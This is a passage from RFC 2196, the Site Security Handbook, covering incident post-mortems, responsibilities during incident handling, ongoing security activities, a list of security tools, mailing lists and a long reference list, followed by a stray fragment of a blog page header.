If an incident is based on poor policy, and unless the policy is
changed, then one is doomed to repeat the past. Once a site has
recovered from and incident, site policy and procedures should be
reviewed to encompass changes to prevent similar incidents. Even
without an incident, it would be prudent to review policies and
procedures on a regular basis. Reviews are imperative due to today's
changing computing environments.

The whole purpose of this post mortem process is to improve all
security measures to protect the site against future attacks. As a
result of an incident, a site or organization should gain practical
knowledge from the experience. A concrete goal of the post mortem is
to develop new proactive methods. Another important facet of the
aftermath may be end user and administrator education to prevent a
reoccurrence of the security problem.

Fraser, Ed. Informational [Page 58]

RFC 2196 Site Security Handbook September 1997

5.6 Responsibilities

5.6.1 Not Crossing the Line

It is one thing to protect one's own network, but quite another to
assume that one should protect other networks. During the handling
of an incident, certain system vulnerabilities of one's own systems
and the systems of others become apparent. It is quite easy and may
even be tempting to pursue the intruders in order to track them.
Keep in mind that at a certain point it is possible to "cross the
line," and, with the best of intentions, become no better than the
intruder.

The best rule when it comes to propriety is to not use any facility
of remote sites which is not public. This clearly excludes any entry
onto a system (such as a remote shell or login session) which is not
expressly permitted. This may be very tempting; after a breach of
security is detected, a system administrator may have the means to
"follow it up," to ascertain what damage is being done to the remote
site. Don't do it! Instead, attempt to reach the appropriate point
of contact for the affected site.

5.6.2 Good Internet Citizenship

During a security incident there are two choices one can make.
First, a site can choose to watch the intruder in the hopes of
catching him; or, the site can go about cleaning up after the
incident and shut the intruder out of the systems. This is a
decision that must be made very thoughtfully, as there may be legal
liabilities if you choose to leave your site open, knowing that an
intruder is using your site as a launching pad to reach out to other
sites. Being a good Internet citizen means that you should try to
alert other sites that may have been impacted by the intruder. These
affected sites may be readily apparent after a thorough review of
your log files.

5.6.3 Administrative Response to Incidents

When a security incident involves a user, the site's security policy
should describe what action is to be taken. The transgression should
be taken seriously, but it is very important to be sure of the role
the user played. Was the user naive? Could there be a mistake in
attributing the security breach to the user? Applying administrative
action that assumes the user intentionally caused the incident may

Fraser, Ed. Informational [Page 59]

RFC 2196 Site Security Handbook September 1997

not be appropriate for a user who simply made a mistake. It may be
appropriate to include sanctions more suitable for such a situation
in your policies (e.g., education or reprimand of a user) in addition
to more stern measures for intentional acts of intrusion and system
misuse.

6. Ongoing Activities

At this point in time, your site has hopefully developed a complete
security policy and has developed procedures to assist in the
configuration and management of your technology in support of those
policies. How nice it would be if you could sit back and relax at
this point and know that you were finished with the job of security.
Unfortunately, that isn't possible. Your systems and networks are
not a static environment, so you will need to review policies and
procedures on a regular basis. There are a number of steps you can
take to help you keep up with the changes around you so that you can
initiate corresponding actions to address those changes. The
following is a starter set and you may add others as appropriate for
your site.

(1) Subscribe to advisories that are issued by various security incident
response teams, like those of the CERT Coordination Center, and
update your systems against those threats that apply to your site's
technology.

(2) Monitor security patches that are produced by the vendors of your
equipment, and obtain and install all that apply.

(3) Actively watch the configurations of your systems to identify any
changes that may have occurred, and investigate all anomalies.

(4) Review all security policies and procedures annually (at a minimum).

(5) Read relevant mailing lists and USENET newsgroups to keep up to
date with the latest information being shared by fellow
administrators.

(6) Regularly check for compliance with policies and procedures. This
audit should be performed by someone other than the people who
define or implement the policies and procedures.

7. Tools and Locations

This chapter provides a brief list of publicly available security
technology which can be downloaded from the Internet. Many of the
items described below will undoubtedly be surpassed or made obsolete
before this document is published.

Fraser, Ed. Informational [Page 60]

RFC 2196 Site Security Handbook September 1997

Some of the tools listed are applications such as end user programs
(clients) and their supporting system infrastructure (servers).
Others are tools that a general user will never see or need to use,
but may be used by applications, or by administrators to troubleshoot
security problems or to guard against intruders.

A sad fact is that there are very few security conscious applications
currently available. Primarily, this is caused by the need for a
security infrastructure which must first be put into place for most
applications to operate securely. There is considerable effort
currently taking place to build this infrastructure so that
applications can take advantage of secure communications.

Most of the tools and applications described below can be found in
one of the following archive sites:

(1) CERT Coordination Center
ftp://info.cert.org:/pub/tools
(2) DFN-CERT
ftp://ftp.cert.dfn.de/pub/tools/
(3) Computer Operations, Audit, and Security Tools (COAST)
coast.cs.purdue.edu:/pub/tools

It is important to note that many sites, including CERT and COAST are
mirrored throughout the Internet. Be careful to use a "well known"
mirror site to retrieve software, and to use verification tools (md5
checksums, etc.) to validate that software. A clever cracker might
advertise security software that has intentionally been designed to
provide access to data or systems.

Tools

COPS
DES
Drawbridge
identd (not really a security tool)
ISS
Kerberos
logdaemon
lsof
MD5
PEM
PGP
rpcbind/portmapper replacement
SATAN
sfingerd
S/KEY
smrsh

Fraser, Ed. Informational [Page 61]

RFC 2196 Site Security Handbook September 1997

ssh
swatch
TCP-Wrapper
tiger
Tripwire*
TROJAN.PL

8. Mailing Lists and Other Resources

It would be impossible to list all of the mail-lists and other
resources dealing with site security. However, these are some "jump-
points" from which the reader can begin. All of these references are
for the "INTERNET" constituency. More specific (vendor and
geographical) resources can be found through these references.

Mailing Lists

(1) CERT(TM) Advisory
Send mail to: cert-advisory-request@cert.org
Message Body: subscribe cert

A CERT advisory provides information on how to obtain a patch or
details of a workaround for a known computer security problem.
The CERT Coordination Center works with vendors to produce a
workaround or a patch for a problem, and does not publish
vulnerability information until a workaround or a patch is
available. A CERT advisory may also be a warning to our
constituency about ongoing attacks (e.g.,
"CA-91:18.Active.Internet.tftp.Attacks").

CERT advisories are also published on the USENET newsgroup:
comp.security.announce

CERT advisory archives are available via anonymous FTP from
info.cert.org in the /pub/cert_advisories directory.

(2) VIRUS-L List
Send mail to: listserv%lehiibm1.bitnet@mitvma.mit.edu
Message Body: subscribe virus-L FIRSTNAME LASTNAME

VIRUS-L is a moderated mailing list with a focus
on computer virus issues. For more information,
including a copy of the posting guidelines, see
the file "virus-l.README", available by anonymous
FTP from cs.ucr.edu.

Fraser, Ed. Informational [Page 62]

RFC 2196 Site Security Handbook September 1997

(3) Internet Firewalls
Send mail to: majordomo@greatcircle.com
Message Body: subscribe firewalls user@host

The Firewalls mailing list is a discussion forum for
firewall administrators and implementors.

USENET newsgroups

(1) comp.security.announce
The comp.security.announce newsgroup is moderated
and is used solely for the distribution of CERT
advisories.

(2) comp.security.misc
The comp.security.misc is a forum for the
discussion of computer security, especially as it
relates to the UNIX(r) Operating System.

(3) alt.security
The alt.security newsgroup is also a forum for the
discussion of computer security, as well as other
issues such as car locks and alarm systems.

(4) comp.virus
The comp.virus newsgroup is a moderated newsgroup
with a focus on computer virus issues. For more
information, including a copy of the posting
guidelines, see the file "virus-l.README",
available via anonymous FTP on info.cert.org
in the /pub/virus-l directory.

(5) comp.risks
The comp.risks newsgroup is a moderated forum on
the risks to the public in computers and related
systems.

World-Wide Web Pages

(1) http://www.first.org/

Computer Security Resource Clearinghouse. The main focus is on
crisis response information; information on computer
security-related threats, vulnerabilities, and solutions. At the
same time, the Clearinghouse strives to be a general index to
computer security information on a broad variety of subjects,
including general risks, privacy, legal issues, viruses,
assurance, policy, and training.

Fraser, Ed. Informational [Page 63]

RFC 2196 Site Security Handbook September 1997

(2) http://www.telstra.com.au/info/security.html

This Reference Index contains a list of links to information
sources on Network and Computer Security. There is no implied
fitness to the Tools, Techniques and Documents contained within this
archive. Many if not all of these items work well, but we do
not guarantee that this will be so. This information is for the
education and legitimate use of computer security techniques only.

(3) http://www.alw.nih.gov/Security/security.html

This page features general information about computer security.
Information is organized by source and each section is organized
by topic. Recent modifications are noted in What's New page.

(4) http://csrc.ncsl.nist.gov

This archive at the National Institute of Standards and Technology's
Computer Security Resource Clearinghouse page contains a number of
announcements, programs, and documents related to computer security.

* CERT and Tripwire are registered in the U.S. Patent and Trademark Office

9. References

The following references may not be available in all countries.

[Appelman, et. al., 1995] Appelman, Heller, Ehrman, White, and
McAuliffe, "The Law and The Internet", USENIX 1995 Technical
Conference on UNIX and Advanced Computing, New Orleans, LA, January
16-20, 1995.

[ABA, 1989] American Bar Association, Section of Science and
Technology, "Guide to the Prosecution of Telecommunication Fraud by
the Use of Computer Crime Statutes", American Bar Association, 1989.

[Aucoin, 1989] R. Aucoin, "Computer Viruses: Checklist for Recovery",
Computers in Libraries, Vol. 9, No. 2, Pg. 4, February 1989.

[Barrett, 1996] D. Barrett, "Bandits on the Information
Superhighway", O'Reilly & Associates, Sebastopol, CA, 1996.

[Bates, 1992] R. Bates, "Disaster Recovery Planning: Networks,
Telecommunications and Data Communications", McGraw-Hill, 1992.

[Bellovin, 1989] S. Bellovin, "Security Problems in the TCP/IP
Protocol Suite", Computer Communication Review, Vol 19, 2, pp. 32-48,
April 1989.

Fraser, Ed. Informational [Page 64]

RFC 2196 Site Security Handbook September 1997

[Bellovin, 1990] S. Bellovin, and M. Merritt, "Limitations of the
Kerberos Authentication System", Computer Communications Review,
October 1990.

[Bellovin, 1992] S. Bellovin, "There Be Dragon", USENIX: Proceedings
of the Third Usenix Security Symposium, Baltimore, MD. September,
1992.

[Bender, 1894] D. Bender, "Computer Law: Evidence and Procedure", M.
Bender, New York, NY, 1978-present.

[Bloombecker, 1990] B. Bloombecker, "Spectacular Computer Crimes",
Dow Jones- Irwin, Homewood, IL. 1990.

[Brand, 1990] R. Brand, "Coping with the Threat of Computer Security
Incidents: A Primer from Prevention through Recovery", R. Brand, 8
June 1990.

[Brock, 1989] J. Brock, "November 1988 Internet Computer Virus and
the Vulnerability of National Telecommunications Networks to Computer
Viruses", GAO/T-IMTEC-89-10, Washington, DC, 20 July 1989.

[BS 7799] British Standard, BS Tech Cttee BSFD/12, Info. Sec. Mgmt,
"BS 7799 : 1995 Code of Practice for Information Security
Management", British Standards Institution, London, 54, Effective 15
February 1995.

[Caelli, 1988] W. Caelli, Editor, "Computer Security in the Age of
Information", Proceedings of the Fifth IFIP International Conference
on Computer Security, IFIP/Sec '88.

[Carroll, 1987] J. Carroll, "Computer Security", 2nd Edition,
Butterworth Publishers, Stoneham, MA, 1987.

[Cavazos and Morin, 1995] E. Cavazos and G. Morin, "Cyber-Space and
The Law", MIT Press, Cambridge, MA, 1995.

[CCH, 1989] Commerce Clearing House, "Guide to Computer Law",
(Topical Law Reports), Chicago, IL., 1989.

[Chapman, 1992] B. Chapman, "Network(In) Security Through IP Packet
Filtering", USENIX: Proceedings of the Third UNIX Security Symposium,
Baltimore, MD, September 1992.

[Chapman and Zwicky, 1995] B. Chapman and E. Zwicky, "Building
Internet Firewalls", O'Reilly and Associates, Sebastopol, CA, 1995.

Fraser, Ed. Informational [Page 65]

RFC 2196 Site Security Handbook September 1997

[Cheswick, 1990] B. Cheswick, "The Design of a Secure Internet
Gateway", Proceedings of the Summer Usenix Conference, Anaheim, CA,
June 1990.

[Cheswick1] W. Cheswick, "An Evening with Berferd In Which a Cracker
is Lured, Endured, and Studied", AT&T Bell Laboratories.

[Cheswick and Bellovin, 1994] W. Cheswick and S. Bellovin, "Firewalls
and Internet Security: Repelling the Wily Hacker", Addison-Wesley,
Reading, MA, 1994.

[Conly, 1989] C. Conly, "Organizing for Computer Crime Investigation
and Prosecution", U.S. Dept. of Justice, Office of Justice Programs,
Under Contract Number OJP-86-C-002, National Institute of Justice,
Washington, DC, July 1989.

[Cooper, 1989] J. Cooper, "Computer and Communications Security:
Strategies for the 1990s", McGraw-Hill, 1989.

[CPSR, 1989] Computer Professionals for Social Responsibility, "CPSR
Statement on the Computer Virus", CPSR, Communications of the ACM,
Vol. 32, No. 6, Pg. 699, June 1989.

[CSC-STD-002-85, 1985] Department of Defense, "Password Management
Guideline", CSC-STD-002-85, 12 April 1985, 31 pages.

[Curry, 1990] D. Curry, "Improving the Security of Your UNIX System",
SRI International Report ITSTD-721-FR-90-21, April 1990.

[Curry, 1992] D. Curry, "UNIX System Security: A Guide for Users and
Systems Administrators", Addision-Wesley, Reading, MA, 1992.

[DDN88] Defense Data Network, "BSD 4.2 and 4.3 Software Problem
Resolution", DDN MGT Bulletin #43, DDN Network Information Center, 3
November 1988.

[DDN89] DCA DDN Defense Communications System, "DDN Security Bulletin
03", DDN Security Coordination Center, 17 October 1989.

[Denning, 1990] P. Denning, Editor, "Computers Under Attack:
Intruders, Worms, and Viruses", ACM Press, 1990.

[Eichin and Rochlis, 1989] M. Eichin, and J. Rochlis, "With
Microscope and Tweezers: An Analysis of the Internet Virus of
November 1988", Massachusetts Institute of Technology, February 1989.

Fraser, Ed. Informational [Page 66]

RFC 2196 Site Security Handbook September 1997

[Eisenberg, et. al., 89] T. Eisenberg, D. Gries, J. Hartmanis, D.
Holcomb, M. Lynn, and T. Santoro, "The Computer Worm", Cornell
University, 6 February 1989.

[Ermann, Willians, and Gutierrez, 1990] D. Ermann, M. Williams, and
C. Gutierrez, Editors, "Computers, Ethics, and Society", Oxford
University Press, NY, 1990. (376 pages, includes bibliographical
references).

[Farmer and Spafford, 1990] D. Farmer and E. Spafford, "The COPS
Security Checker System", Proceedings of the Summer 1990 USENIX
Conference, Anaheim, CA, Pgs. 165-170, June 1990.

[Farrow, 1991] Rik Farrow, "UNIX Systems Security", Addison-Wesley,
Reading, MA, 1991.

[Fenwick, 1985] W. Fenwick, Chair, "Computer Litigation, 1985: Trial
Tactics and Techniques", Litigation Course Handbook Series No. 280,
Prepared for distribution at the Computer Litigation, 1985: Trial
Tactics and Techniques Program, February-March 1985.

[Fites 1989] M. Fites, P. Kratz, and A. Brebner, "Control and
Security of Computer Information Systems", Computer Science Press,
1989.

[Fites, Johnson, and Kratz, 1992] Fites, Johnson, and Kratz, "The
Computer Virus Crisis", Van Hostrand Reinhold, 2nd edition, 1992.

[Forester and Morrison, 1990] T. Forester, and P. Morrison, "Computer
Ethics: Tales and Ethical Dilemmas in Computing", MIT Press,
Cambridge, MA, 1990.

[Foster and Morrision, 1990] T. Forester, and P. Morrison, "Computer
Ethics: Tales and Ethical Dilemmas in Computing", MIT Press,
Cambridge, MA, 1990. (192 pages including index.)

[GAO/IMTEX-89-57, 1989] U.S. General Accounting Office, "Computer
Security - Virus Highlights Need for Improved Internet Management",
United States General Accounting Office, Washington, DC, 1989.

[Garfinkel and Spafford, 1991] S. Garfinkel, and E. Spafford,
"Practical Unix Security", O'Reilly & Associates, ISBN 0-937175-72-2,
May 1991.

[Garfinkel, 1995] S. Garfinkel, "PGP:Pretty Good Privacy", O'Reilly &
Associates, Sebastopol, CA, 1996.

Fraser, Ed. Informational [Page 67]

RFC 2196 Site Security Handbook September 1997

[Garfinkel and Spafford, 1996] S. Garfinkel and E. Spafford,
"Practical UNIX and Internet Security", O'Reilly & Associates,
Sebastopol, CA, 1996.

[Gemignani, 1989] M. Gemignani, "Viruses and Criminal Law",
Communications of the ACM, Vol. 32, No. 6, Pgs. 669-671, June 1989.

[Goodell, 1996] J. Goodell, "The Cyberthief and the Samurai: The True
Story of Kevin Mitnick-And The Man Who Hunted Him Down", Dell
Publishing, 1996.

[Gould, 1989] C. Gould, Editor, "The Information Web: Ethical and
Social Implications of Computer Networking", Westview Press, Boulder,
CO, 1989.

[Greenia, 1989] M. Greenia, "Computer Security Information
Sourcebook", Lexikon Services, Sacramento, CA, 1989.

[Hafner and Markoff, 1991] K. Hafner and J. Markoff, "Cyberpunk:
Outlaws and Hackers on the Computer Frontier", Touchstone, Simon &
Schuster, 1991.

[Hess, Safford, and Pooch] D. Hess, D. Safford, and U. Pooch, "A Unix
Network Protocol Security Study: Network Information Service", Texas
A&M University.

[Hoffman, 1990] L. Hoffman, "Rogue Programs: Viruses, Worms, and
Trojan Horses", Van Nostrand Reinhold, NY, 1990. (384 pages,
includes bibliographical references and index.)

[Howard, 1995] G. Howard, "Introduction to Internet Security: From
Basics to Beyond", Prima Publishing, Rocklin, CA, 1995.

[Huband and Shelton, 1986] F. Huband, and R. Shelton, Editors,
"Protection of Computer Systems and Software: New Approaches for
Combating Theft of Software and Unauthorized Intrusion", Papers
presented at a workshop sponsored by the National Science Foundation,
1986.

[Hughes, 1995] L. Hughes Jr., "Actually Useful Internet Security
Techniques", New Riders Publishing, Indianapolis, IN, 1995.

[IAB-RFC1087, 1989] Internet Activities Board, "Ethics and the
Internet", RFC 1087, IAB, January 1989. Also appears in the
Communications of the ACM, Vol. 32, No. 6, Pg. 710, June 1989.

Fraser, Ed. Informational [Page 68]

RFC 2196 Site Security Handbook September 1997

[Icove, Seger, and VonStorch, 1995] D. Icove, K. Seger, and W.
VonStorch, "Computer Crime: A Crimefighter's Handbook", O'Reilly &
Associates, Sebastopol, CA, 1995.

[IVPC, 1996] IVPC, "International Virus Prevention Conference '96
Proceedings", NCSA, 1996.

[Johnson and Podesta] D. Johnson, and J. Podesta, "Formulating A
Company Policy on Access to and Use and Disclosure of Electronic Mail
on Company Computer Systems".

[Kane, 1994] P. Kane, "PC Security and Virus Protection Handbook: The
Ongoing War Against Information Sabotage", M&T Books, 1994.

[Kaufman, Perlman, and Speciner, 1995] C. Kaufman, R. Perlman, and M.
Speciner, "Network Security: PRIVATE Communication in a PUBLIC
World", Prentice Hall, Englewood Cliffs, NJ, 1995.

[Kent, 1990] S. Kent, "E-Mail Privacy for the Internet: New Software
and Strict Registration Procedures will be Implemented this Year",
Business Communications Review, Vol. 20, No. 1, Pg. 55, 1 January
1990.

[Levy, 1984] S. Levy, "Hacker: Heroes of the Computer Revolution",
Delta, 1984.

[Lewis, 1996] S. Lewis, "Disaster Recovery Yellow Pages", The Systems
Audit Group, 1996.

[Littleman, 1996] J. Littleman, "The Fugitive Game: Online with Kevin
Mitnick", Little, Brown, Boston, MA., 1996.

[Lu and Sundareshan, 1989] W. Lu and M. Sundareshan, "Secure
Communication in Internet Environments: A Hierarchical Key Management
Scheme for End-to-End Encryption", IEEE Transactions on
Communications, Vol. 37, No. 10, Pg. 1014, 1 October 1989.

[Lu and Sundareshan, 1990] W. Lu and M. Sundareshan, "A Model for
Multilevel Security in Computer Networks", IEEE Transactions on
Software Engineering, Vol. 16, No. 6, Page 647, 1 June 1990.

[Martin and Schinzinger, 1989] M. Martin, and R. Schinzinger, "Ethics
in Engineering", McGraw Hill, 2nd Edition, 1989.

[Merkle] R. Merkle, "A Fast Software One Way Hash Function", Journal
of Cryptology, Vol. 3, No. 1.

Fraser, Ed. Informational [Page 69]

RFC 2196 Site Security Handbook September 1997

[McEwen, 1989] J. McEwen, "Dedicated Computer Crime Units", Report
Contributors: D. Fester and H. Nugent, Prepared for the National
Institute of Justice, U.S. Department of Justice, by Institute for
Law and Justice, Inc., under contract number OJP-85-C-006,
Washington, DC, 1989.

[MIT, 1989] Massachusetts Institute of Technology, "Teaching Students
About Responsible Use of Computers", MIT, 1985-1986. Also reprinted
in the Communications of the ACM, Vol. 32, No. 6, Pg. 704, Athena
Project, MIT, June 1989.

[Mogel, 1989] Mogul, J., "Simple and Flexible Datagram Access
Controls for UNIX-based Gateways", Digital Western Research
Laboratory Research Report 89/4, March 1989.

[Muffett, 1992] A. Muffett, "Crack Version 4.1: A Sensible Password
Checker for Unix"

[NCSA1, 1995] NCSA, "NCSA Firewall Policy Guide", 1995.

[NCSA2, 1995] NCSA, "NCSA's Corporate Computer Virus Prevention
Policy Model", NCSA, 1995.

[NCSA, 1996] NCSA, "Firewalls & Internet Security Conference '96
Proceedings", 1996.

[NCSC-89-660-P, 1990] National Computer Security Center, "Guidelines
for Formal Verification Systems", Shipping list no.: 89-660-P, The
Center, Fort George G. Meade, MD, 1 April 1990.

[NCSC-89-254-P, 1988] National Computer Security Center, "Glossary of
Computer Security Terms", Shipping list no.: 89-254-P, The Center,
Fort George G. Meade, MD, 21 October 1988.

[NCSC-C1-001-89, 1989] Tinto, M., "Computer Viruses: Prevention,
Detection, and Treatment", National Computer Security Center C1
Technical Report C1-001-89, June 1989.

[NCSC Conference, 1989] National Computer Security Conference, "12th
National Computer Security Conference: Baltimore Convention Center,
Baltimore, MD, 10-13 October, 1989: Information Systems Security,
Solutions for Today - Concepts for Tomorrow", National Institute of
Standards and National Computer Security Center, 1989.

[NCSC-CSC-STD-003-85, 1985] National Computer Security Center,
"Guidance for Applying the Department of Defense Trusted Computer
System Evaluation Criteria in Specific Environments", CSC-STD-003-85,
NCSC, 25 June 1985.

Fraser, Ed. Informational [Page 70]

RFC 2196 Site Security Handbook September 1997

[NCSC-STD-004-85, 1985] National Computer Security Center, "Technical
Rationale Behind CSC-STD-003-85: Computer Security Requirements",
CSC-STD-004-85, NCSC, 25 June 1985.

[NCSC-STD-005-85, 1985] National Computer Security Center, "Magnetic
Remanence Security Guideline", CSC-STD-005-85, NCSC, 15 November
1985.

[NCSC-TCSEC, 1985] National Computer Security Center, "Trusted
Computer System Evaluation Criteria", DoD 5200.28-STD, CSC-STD-001-
83, NCSC, December 1985.

[NCSC-TG-003, 1987] NCSC, "A Guide to Understanding DISCRETIONARY
ACCESS CONTROL in Trusted Systems", NCSC-TG-003, Version-1, 30
September 1987, 29 pages.

[NCSC-TG-001, 1988] NCSC, "A Guide to Understanding AUDIT in Trusted
Systems", NCSC-TG-001, Version-2, 1 June 1988, 25 pages.

[NCSC-TG-004, 1988] National Computer Security Center, "Glossary of
Computer Security Terms", NCSC-TG-004, NCSC, 21 October 1988.

[NCSC-TG-005, 1987] National Computer Security Center, "Trusted
Network Interpretation", NCSC-TG-005, NCSC, 31 July 1987.

[NCSC-TG-006, 1988] NCSC, "A Guide to Understanding CONFIGURATION
MANAGEMENT in Trusted Systems", NCSC-TG-006, Version-1, 28 March
1988, 31 pages.

[NCSC-TRUSIX, 1990] National Computer Security Center, "Trusted UNIX
Working Group (TRUSIX) rationale for selecting access control list
features for the UNIX system", Shipping list no.: 90-076-P, The
Center, Fort George G. Meade, MD, 1990.

[NRC, 1991] National Research Council, "Computers at Risk: Safe
Computing in the Information Age", National Academy Press, 1991.

[Nemeth, et. al, 1995] E. Nemeth, G. Snyder, S. Seebass, and T. Hein,
"UNIX Systems Administration Handbook", Prentice Hall PTR, Englewood
Cliffs, NJ, 2nd ed. 1995.

[NIST, 1989] National Institute of Standards and Technology,
"Computer Viruses and Related Threats: A Management Guide", NIST
Special Publication 500-166, August 1989.

[NSA] National Security Agency, "Information Systems Security
Products and Services Catalog", NSA, Quarterly Publication.

Fraser, Ed. Informational [Page 71]

RFC 2196 Site Security Handbook September 1997

[NSF, 1988] National Science Foundation, "NSF Poses Code of
Networking Ethics", Communications of the ACM, Vol. 32, No. 6, Pg.
688, June 1989. Also appears in the minutes of the regular meeting
of the Division Advisory Panel for Networking and Communications
Research and Infrastructure, Dave Farber, Chair, November 29-30,
1988.

[NTISSAM, 1987] NTISS, "Advisory Memorandum on Office Automation
Security Guideline", NTISSAM COMPUSEC/1-87, 16 January 1987, 58
pages.

[OTA-CIT-310, 1987] United States Congress, Office of Technology
Assessment, "Defending Secrets, Sharing Data: New Locks and Keys for
Electronic Information", OTA-CIT-310, October 1987.

[OTA-TCT-606] Congress of the United States, Office of Technology
Assessment, "Information Security and Privacy in Network
Environments", OTA-TCT-606, September 1994.

[Palmer and Potter, 1989] I. Palmer, and G. Potter, "Computer
Security Risk Management", Van Nostrand Reinhold, NY, 1989.

[Parker, 1989] D. Parker, "Computer Crime: Criminal Justice Resource
Manual", U.S. Dept. of Justice, National Institute of Justice, Office
of Justice Programs, Under Contract Number OJP-86-C-002, Washington,
D.C., August 1989.

[Parker, Swope, and Baker, 1990] D. Parker, S. Swope, and B. Baker,
"Ethical Conflicts: Information and Computer Science, Technology and
Business", QED Information Sciences, Inc., Wellesley, MA. (245
pages).

[Pfleeger, 1989] C. Pfleeger, "Security in Computing", Prentice-Hall,
Englewood Cliffs, NJ, 1989.

[Quarterman, 1990] J. Quarterman, J., "The Matrix: Computer Networks
and Conferencing Systems Worldwide", Digital Press, Bedford, MA,
1990.

[Ranum1, 1992] M. Ranum, "An Internet Firewall", Proceedings of World
Conference on Systems Management and Security, 1992.

[Ranum2, 1992] M. Ranum, "A Network Firewall", Digital Equipment
Corporation Washington Open Systems Resource Center, June 12, 1992.

[Ranum, 1993] M. Ranum, "Thinking About Firewalls", 1993.

Fraser, Ed. Informational [Page 72]

RFC 2196 Site Security Handbook September 1997

[Ranum and Avolio, 1994] M. Ranum and F. Avolio, "A Toolkit and
Methods for Internet Firewalls", Trustest Information Systems, 1994.

[Reinhardt, 1992] R. Reinhardt, "An Architectural Overview of UNIX
Network Security"

[Reinhardt, 1993] R. Reinhardt, "An Architectural Overview of UNIX
Network Security", ARINC Research Corporation, February 18, 1993.

[Reynolds-RFC1135, 1989] The Helminthiasis of the Internet, RFC 1135,
USC/Information Sciences Institute, Marina del Rey, CA, December
1989.

[Russell and Gangemi, 1991] D. Russell and G. Gangemi, "Computer
Security Basics" O'Reilly & Associates, Sebastopol, CA, 1991.

[Schneier 1996] B. Schneier, "Applied Cryptography: Protocols,
Algorithms, and Source Code in C", John Wiley & Sons, New York,
second edition, 1996.

[Seeley, 1989] D. Seeley, "A Tour of the Worm", Proceedings of 1989
Winter USENIX Conference, Usenix Association, San Diego, CA, February
1989.

[Shaw, 1986] E. Shaw Jr., "Computer Fraud and Abuse Act of 1986",
Congressional Record (3 June 1986), Washington, D.C., 3 June 1986.

[Shimomura, 1996] T. Shimomura with J. Markoff, "Takedown:The Pursuit
and Capture of Kevin Mitnick, America's Most Wanted Computer Outlaw-
by the Man Who Did It", Hyperion, 1996.

[Shirey, 1990] R. Shirey, "Defense Data Network Security
Architecture", Computer Communication Review, Vol. 20, No. 2, Page
66, 1 April 1990.

[Slatalla and Quittner, 1995] M. Slatalla and J. Quittner, "Masters
of Deception: The Gang that Ruled Cyberspace", Harper Collins
Publishers, 1995.

[Smith, 1989] M. Smith, "Commonsense Computer Security: Your
Practical Guide to Preventing Accidental and Deliberate Electronic
Data Loss", McGraw-Hill, New York, NY, 1989.

[Smith, 1995] D. Smith, "Forming an Incident Response Team", Sixth
Annual Computer Security Incident Handling Workshop, Boston, MA, July
25-29, 1995.

Fraser, Ed. Informational [Page 73]

RFC 2196 Site Security Handbook September 1997

[Spafford, 1988] E. Spafford, "The Internet Worm Program: An
Analysis", Computer Communication Review, Vol. 19, No. 1, ACM SIGCOM,
January 1989. Also issued as Purdue CS Technical Report CSD-TR-823,
28 November 1988.

[Spafford, 1989] G. Spafford, "An Analysis of the Internet Worm",
Proceedings of the European Software Engineering Conference 1989,
Warwick England, September 1989. Proceedings published by Springer-
Verlag as: Lecture Notes in Computer Science #387. Also issued as
Purdue Technical Report #CSD-TR-933.

[Spafford, Keaphy, and Ferbrache, 1989] E. Spafford, K. Heaphy, and
D. Ferbrache, "Computer Viruses: Dealing with Electronic Vandalism
and Programmed Threats", ADAPSO, 1989. (109 pages.)

[Stallings1, 1995] W. Stallings, "Internet Security Handbook", IDG
Books, Foster City CA, 1995.

[Stallings2, 1995] W. Stallings, "Network and InterNetwork Security",
Prentice Hall, , 1995.

[Stallings3, 1995] W. Stallings, "Protect Your Privacy: A Guide for
PGP Users" PTR Prentice Hall, 1995.

[Stoll, 1988] C. Stoll, "Stalking the Wily Hacker", Communications of
the ACM, Vol. 31, No. 5, Pgs. 484-497, ACM, New York, NY, May 1988.

[Stoll, 1989] C. Stoll, "The Cuckoo's Egg", ISBN 00385-24946-2,
Doubleday, 1989.

[Treese and Wolman, 1993] G. Treese and A. Wolman, "X Through the
Firewall, and Other Applications Relays", Digital Equipment
Corporation, Cambridge Research Laboratory, CRL 93/10, May 3, 1993.

[Trible, 1986] P. Trible, "The Computer Fraud and Abuse Act of 1986",
U.S. Senate Committee on the Judiciary, 1986.

[Venema] W. Venema, "TCP WRAPPER: Network monitoring, access control,
and booby traps", Mathematics and Computing Science, Eindhoven
University of Technology, The Netherlands.

[USENIX, 1988] USENIX, "USENIX Proceedings: UNIX Security Workshop",
Portland, OR, August 29-30, 1988.

[USENIX, 1990] USENIX, "USENIX Proceedings: UNIX Security II
Workshop", Portland, OR, August 27-28, 1990.

Fraser, Ed. Informational [Page 74]

RFC 2196 Site Security Handbook September 1997

[USENIX, 1992] USENIX, "USENIX Symposium Proceedings: UNIX Security
III", Baltimore, MD, September 14-16, 1992.

[USENIX, 1993] USENIX, "USENIX Symposium Proceedings: UNIX Security
IV", Santa Clara, CA, October 4-6, 1993.

[USENIX, 1995] USENIX, "The Fifth USENIX UNIX Security Symposium",
Salt Lake City, UT, June 5-7, 1995.

[Wood, et.al., 1987] C. Wood, W. Banks, S. Guarro, A. Garcia, V.
Hampel, and H. Sartorio, "Computer Security: A Comprehensive
Controls Checklist", John Wiley and Sons, Interscience Publication,
1987.

[Wrobel, 1993] L. Wrobel, "Writing Disaster Recovery Plans for
Telecommunications Networks and LANS", Artech House, 1993.

[Vallabhaneni, 1989] S. Vallabhaneni, "Auditing Computer Security: A
Manual with Case Studies", Wiley, New York, NY, 1989.

Security Considerations

This entire document discusses security issues.

Editor Information

Barbara Y. Fraser
Software Engineering Institute
Carnegie Mellon University
5000 Forbes Avenue
Pittsburgh, PA 15213

Phone: (412) 268-5010
Fax: (412) 268-6989
EMail: byf@cert.org

Fraser, Ed. Informational [Page 75]

ne12abaa3_hacking

Friday, November 03, 2006

Defeating Denial of Service Attacks which employ

Links

Previous Posts

Archives